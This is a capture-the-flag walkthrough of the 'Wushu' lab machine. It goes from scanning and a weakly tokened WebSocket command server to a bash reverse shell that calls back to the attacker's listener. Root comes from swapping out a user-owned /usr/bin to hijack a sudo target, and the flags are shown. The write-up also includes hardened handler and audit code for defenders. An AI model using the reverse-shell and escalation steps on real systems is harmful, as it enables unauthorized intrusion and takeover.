Wushu

Target description

  • QQ group: 660930334

I. Information gathering

1. Host discovery

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-25 10:02 CST
Nmap scan report for 192.168.2.1
Host is up (0.00029s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00021s latency).
MAC Address: 08:00:27:79:58:95 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.17
Host is up (0.00064s latency).
MAC Address: 08:00:27:9F:9E:3E (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.15 seconds

Target IP: 192.168.2.17

2. Port scanning

1) Full port scan

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# nmap --min-rate 10000 -p- 192.168.2.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-25 10:03 CST
Nmap scan report for 192.168.2.17
Host is up (0.00043s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8765/tcp open ultraseek-http
MAC Address: 08:00:27:9F:9E:3E (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.74 seconds

Open ports: 22, 80, 8765

2) Service and version scan

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,8765,95 192.168.2.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-28 10:12 CST
Nmap scan report for 192.168.2.17
Host is up (0.00095s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Site doesn't have a title (text/html).
95/tcp closed supdup
8765/tcp open ultraseek-http?
MAC Address: 08:00:27:9F:9E:3E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.88 seconds
  1. Port 22: SSH service
  2. Port 80: HTTP service
  3. Port 8765: unknown service

II. Service enumeration

1. Port 80 - HTTP service

Probing the service on port 80

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# curl http://192.168.2.17
index

Nothing of interest: the response body is just the word "index".

2. Port 8765 - unknown service

Probing the service on port 8765

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# curl http://192.168.2.17:8765
Failed to open a WebSocket connection: missing Connection header.

You cannot access a WebSocket server directly with a browser. You need a WebSocket client.

This is a WebSocket service.

3. WebSocket service analysis

WebSocket is a protocol that provides full-duplex communication over a single TCP connection and is commonly used by real-time applications. The error message says the endpoint must be reached with a WebSocket client rather than a plain HTTP request.

Tip:
https://book.hacktricks.wiki/en/pentesting-web/websocket-attacks.html?highlight=websoca#linux-console
https://zh.wikipedia.org/wiki/WebSocket

III. WebSocket attack

1. Establishing a WebSocket connection

Connect to the WebSocket service with the websockets command-line client

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# websockets ws://192.168.2.17:8765
Connected to ws://192.168.2.17:8765.
< {"type": "system", "message": "Connected to command server. Send commands use JSON"}

Commands must be sent as JSON.

2. JSON command test

Try running id

> {"command": "id"}
< {"type": "error", "message": "Invalid token. Access denied."}

The server demands a token.

3. Token bypass

Try common token values

> {"token": "admin", "command": "id"}
< {"type": "result", "command": "id", "output": "uid=1000(caidao) gid=1000(caidao) groups=1000(caidao)\n"}

The id command executes successfully as user caidao: the guessable static token "admin" is all that gates command execution.
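The box's real server code is not on the page, so the following is an added example written for this write-up: handle_weak() reconstructs the behaviour observed above (a static token, the command string handed to a shell), and handle_hardened() shows what a defensible version of the same JSON protocol looks like. The token value, the allowlisted command names and the function names are all assumptions.

```python
import hmac
import json
import secrets
import subprocess

# Constructed for this write-up; not the box's actual server. handle_weak()
# reproduces the behaviour seen over the WebSocket: a static, guessable token
# gates arbitrary commands that are executed by a shell.
WEAK_TOKEN = "admin"


def handle_weak(raw: str) -> dict:
    msg = json.loads(raw)
    if msg.get("token") != WEAK_TOKEN:
        return {"type": "error", "message": "Invalid token. Access denied."}
    out = subprocess.run(msg["command"], shell=True, capture_output=True, text=True)
    return {"type": "result", "command": msg["command"], "output": out.stdout}


# Hardened handler: a random per-start token instead of a hard-coded word,
# constant-time comparison, a fixed allowlist of argv vectors, and no shell.
SERVER_TOKEN = secrets.token_urlsafe(32)
ALLOWED = {
    "whoami": ["id", "-un"],
    "date": ["date", "-u"],
}


def handle_hardened(raw: str, expected_token: str = SERVER_TOKEN) -> dict:
    try:
        msg = json.loads(raw)
        if not isinstance(msg, dict):
            raise ValueError("not an object")
    except ValueError:                      # JSONDecodeError is a ValueError
        return {"type": "error", "message": "Malformed JSON."}
    token = msg.get("token")
    if not isinstance(token, str) or not hmac.compare_digest(
            token.encode(), expected_token.encode()):
        return {"type": "error", "message": "Invalid token. Access denied."}
    argv = ALLOWED.get(msg.get("command"))  # opaque name -> fixed argv, no user text
    if argv is None:
        return {"type": "error", "message": "Unknown command."}
    out = subprocess.run(argv, capture_output=True, text=True, timeout=5)
    return {"type": "result", "command": msg["command"], "output": out.stdout}
```

Wire either handler into an actual WebSocket server by calling it on each received text frame and sending back json.dumps() of the returned dict.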

IV. Reverse shell

1. Obtaining the initial shell

Send a reverse shell command through the WebSocket

> {"token": "admin", "command": "bash -c '/bin/bash -i >& /dev/tcp/192.168.2.4/4444 0>&1'"}

The shell comes back to the listener

┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.17] 44994
bash: cannot set terminal process group (390): Inappropriate ioctl for device
bash: no job control in this shell
caidao@Wushu:/root$ id
id
uid=1000(caidao) gid=1000(caidao) groups=1000(caidao)

2. Stabilizing the shell

script /dev/null -c bash
# Ctrl+Z
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 36 columns 178

V. Privilege escalation

1. Checking sudo privileges

caidao@Wushu:~$ sudo -l
Matching Defaults entries for caidao on Wushu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User caidao may run the following commands on Wushu:
(ALL : ALL) NOPASSWD: /usr/bin/2048

/usr/bin/2048 can be run through sudo without a password.

2. Finding files owned by the current user

caidao@Wushu:~$ find / -user $(whoami) ! -path '/proc/*' ! -path '/sys/*' ! -path '/run/*' 2>/dev/null
/dev/pts/2
/dev/pts/1
/dev/pts/0
/usr

The /usr directory is owned by the current user caidao.

Verify the permissions on /usr

caidao@Wushu:~$ ls -la /usr
total 92
drwxr-xr-x 14 caidao caidao 4096 Aug 18 10:03 .
drwxr-xr-x 18 root root 4096 Mar 18 2025 ..
drwxr-xr-x 2 root root 28672 Aug 18 09:58 bin

This confirms that /usr is owned by caidao, a serious permission misconfiguration: the owner of a directory can rename or remove its entries regardless of who owns them, so /usr/bin itself can be moved aside even though it belongs to root.

3. Exploiting the directory permissions

Because caidao has write access to /usr, the sudo target /usr/bin/2048 can be replaced to obtain root:

  1. Rename the /usr/bin directory to /usr/1
  2. Create a malicious 2048 program
  3. Run it through sudo to obtain root

1) Move the original bin directory aside and create a new one

# move the original bin directory aside
caidao@Wushu:~$ mv /usr/bin /usr/1

# create a new bin directory
caidao@Wushu:~$ /usr/1/mkdir /usr/bin

2) Create the malicious 2048 program

caidao@Wushu:/$ /usr/1/nano /usr/bin/2048
caidao@Wushu:/$ /usr/1/chmod +x /usr/bin/2048
caidao@Wushu:/$ /usr/1/cat /usr/bin/2048
#!/usr/1/bash
/usr/1/chmod +s /usr/1/bash

3) Run it through sudo to set the setuid bit

caidao@Wushu:~$ /usr/1/sudo /usr/bin/2048

4) Verify that bash now carries the setuid bit

caidao@Wushu:~$ /usr/1/ls -al /usr/1/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /usr/1/bash

5) Use -p so bash keeps the effective privileges

caidao@Wushu:~$ /usr/1/bash -p

6) Restore the system

bash-5.0# /usr/1/rm -rf /usr/bin/
bash-5.0# /usr/1/mv /usr/1/ /usr/bin/
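The root cause found in section 2 and exploited in section 3 is a sudo target sitting under a directory that a non-root user owns. As an added example for this write-up (not a tool from the box or from the Maze-sec project), the helper below parses the `sudo -l` rule lines and walks every path component of each target, flagging any component that a non-root user could rename or replace. The sample `sudo -l` text is copied from the output above; the fake filesystem in the comments and the function names are assumptions.

```python
import os
import pwd
import re
import stat
from typing import Callable, Dict, List, Tuple

# Constructed audit helper for this write-up; not from the box or the project.
# A path component that is not owned by root, or that group/others can write
# without the sticky bit, lets an unprivileged user swap out whatever sudo
# will later run as root. On Wushu that component was /usr (owned by caidao).

SUDO_L_SAMPLE = """\
User caidao may run the following commands on Wushu:
    (ALL : ALL) NOPASSWD: /usr/bin/2048
"""  # copied from the write-up's sudo -l output


def sudo_targets(sudo_l_output: str) -> List[str]:
    """Absolute command paths taken from the rule lines of `sudo -l` output."""
    paths = []
    for line in sudo_l_output.splitlines():
        if line.strip().startswith("("):      # rule lines look like "(ALL : ALL) ..."
            paths.extend(re.findall(r"(?<![\w/])/[^\s,]+", line))
    return paths


def _real_stat(path: str) -> Tuple[str, int]:
    st = os.stat(path)
    return pwd.getpwuid(st.st_uid).pw_name, st.st_mode


def weak_components(target: str,
                    stat_fn: Callable[[str], Tuple[str, int]] = _real_stat) -> List[str]:
    """Findings for each component of target that a non-root user could replace."""
    parts = [p for p in os.path.normpath(target).split("/") if p]
    prefixes = ["/"] + ["/" + "/".join(parts[:i + 1]) for i in range(len(parts))]
    findings = []
    for p in prefixes:
        owner, st_mode = stat_fn(p)          # stat_fn is injectable for offline testing
        perms = stat.S_IMODE(st_mode)
        if owner != "root":
            findings.append(f"{p}: owned by {owner}, not root")
        elif perms & 0o022 and not (stat.S_ISDIR(st_mode) and perms & stat.S_ISVTX):
            findings.append(f"{p}: writable by group/others (mode {perms:04o})")
    return findings


def audit(sudo_l_output: str, stat_fn=_real_stat) -> Dict[str, List[str]]:
    """Map each sudo target to the replaceable components on its path."""
    return {t: weak_components(t, stat_fn) for t in sudo_targets(sudo_l_output)}
```

Run audit() on the real output of `sudo -l` on a host to get the live result; an empty list for every target means no component on its path is replaceable by a non-root user.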

VI. Getting the flags

bash-5.0# cat /root/root.txt /home/caidao/user.txt 
flag{root-bcb44f5672d98ad8a966ed474335716d}
flag{user-4141b1d21f4cbcfcfe214d474e9fb6b2}

Wushu
http://miao-sec.github.io/Maze-sec/Wushu/
Author: Miao
Published: January 9, 2026
License: BY-MIAO